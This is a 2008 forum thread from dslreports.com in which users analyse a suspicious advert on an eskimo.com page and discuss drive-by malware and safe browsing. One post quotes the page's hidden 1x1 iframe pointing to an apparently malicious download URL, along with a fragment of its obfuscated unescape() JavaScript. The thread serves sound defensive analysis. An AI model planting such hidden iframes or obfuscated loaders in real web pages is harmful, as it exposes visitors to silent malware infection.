Re: Does anyone know anything about this advert?

Author	All Replies
nwrickert sand groper Premium,MVM join:2004-09-04 Geneva, IL ·AT&T U-Verse ·AT&T Midwest	reply to nwrickert Re: Does anyone know anything about this advert? Here is the iframe definition near the bottom of the eskimo.com page: <iframe src="http://cdpuvbhfzz.com/dl/adv598.php" width=1 height=1></iframe> Anything obfuscated that way looks suspicious to me. the content of the iframe has "unescape('%19%04%3C9%0E%60wL0" and that percent encoding goes on for most of the javascript (around 23000 bytes). Clearly somebody was hiding something. I fetched those pages with "wget", so have local copies. I later tried loading the page in XP with firefox, scripting turned on, but a limited user account. Nothing bad happened. This probably requires IE on an admin account before it can do anything bad. Yet another reason to use a limited user account, to use firefox, to use the noscript extension. -- AT&T dsl; Westell 327w modem/router; SuSE 10.1; firefox 2.0.0.13
	to forum · permalink · · 2008-04-15 22:53:26 ·
EGeezer Go Bobcats Premium join:2002-08-04 Country!	looks like the code in that line directs the user to the aforementiond website's directory: /dl/adv598.php -- Mayors of New York come from nowhere and go nowhere. Wallace Sayre (apparently, so do governors... )
	to forum · permalink · · 2008-04-15 23:02:45 ·
nwrickert sand groper Premium,MVM join:2004-09-04 Geneva, IL ·AT&T U-Verse ·AT&T Midwest 1 edit	yes it does I used "lynx -dump" to decode it, before I posted the target link in an earlier post in this thread. That's quicker than trying to do it manually. I don't currently have a good tool for handling that obfuscated javascript, though.
	to forum · permalink · · 2008-04-15 23:03:14 ·
EGeezer Go Bobcats Premium join:2002-08-04 Country! ·Callcentric ·RoadRunner Cable ·AT&T CallVantage 1 edit	I also see that the adv.php page seems to have a malware warning from stopbadware.org - is that a recent development? This site is currently (as of 04/15/2008) being reported to StopBadware by the following partners:Google: reported bad -- Mayors of New York come from nowhere and go nowhere. Wallace Sayre (apparently, so do governors... )
	to forum · permalink · · 2008-04-15 23:19:22 ·
nwrickert sand groper Premium,MVM join:2004-09-04 Geneva, IL	Not sure. I checked the stopbadware.org site for www.eskimo.com/dsl/ but it isn't listed. Other parts of eskimo.com are listed, but not the one that was used here. I'm not seeing any warning if I try reloading the original link.
	to forum · permalink · · 2008-04-15 23:48:34 ·
EGeezer Go Bobcats Premium join:2002-08-04 Country! ·Callcentric ·RoadRunner Cable ·AT&T CallVantage	I think I might have loaded Google's link instead - Such a dummy I am!! My GET of the actual link only yielded an apache page . -- Mayors of New York come from nowhere and go nowhere. Wallace Sayre (apparently, so do governors... )
	to forum · permalink · · 2008-04-15 23:52:37 ·
newview Ex .. Ex .. Exactly Premium join:2001-10-01 Parsonsburg, MD	reply to nwrickert said by nwrickert : I don't currently have a good tool for handling that obfuscated javascript, though. If you're looking for a good "de-obfuscator", Net Demon does the trick. -- Ö¿Ö The Rules of Spam \| Maryland's Newest Anti-Spam Law Where are we going? And what's with the hand basket?
	to forum · permalink · · 2008-04-16 00:58:48 ·


Saturday, 28-Nov 19:37:55	Terms of Use \| Privacy Policy \| Hosting by www.nac.net - DSL,Hosting & Co-lo \| feedback \| contact over 10 years online! © 1999-2009 dslreports.com.republican-creole page compression OFF